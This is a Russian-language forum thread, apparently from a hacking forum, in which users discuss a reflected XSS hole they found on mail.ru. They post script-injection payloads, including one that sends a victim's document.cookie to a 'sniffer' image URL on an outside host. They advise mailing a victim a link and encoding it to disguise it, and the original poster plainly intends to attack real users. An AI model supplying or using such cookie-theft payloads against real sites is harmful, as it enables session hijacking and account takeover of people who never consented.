пассивная xss на mail.ru, вопрос

Я тут лазил по mail.ru искал XSS, вылитило следующее окно. На то, что было забито в скрипт как предупреждение это не похоже. Так, что это кто нить знает ?

 

>>Так, что это кто нить знает ?
пасвная XSS

 

Скрипт следующий: "><script>alert(XSS)</script>, а выскочела такая бойда почему ?

 

ты чет напутал!
или скрипт нетот пихнул и незаметил...
То что на картинке - результат действия следуйщего скриптк:

Code:

"><script>alert(document.cookie)</script>

 

Блин, да ты прав я именно этим скриптом и пробовал.
А через эту уизвимость куки можно пробивать ?

 

просиш жертву зделать также как и ты зделал с етим скриптом "><script>alert(document.cookie)</script>

 

мочишь xD, искать xss и даже не знать что это и как заюзать, тебе сюда
ну раз спросил то отвечу - да, угнать кукисы можно

 

и что?

она посмотрит на свои куки=///////

ТС
кидаеш жертве линк с яваскриптом в котором будет (сниффер+document.cookie)
и жди куки)
например что то типа:
'><script>img = new Image();img.src="снифферкартинко"+document.cookie;</script>

 

Спасибо, я тока учусь ))

 

только закодировать не забудь

 

Дальше я знаю что делать. Я спросил, чтобы мои действия все не зря были. Ато кинеш жертве, а не работает. Всем Спасибо !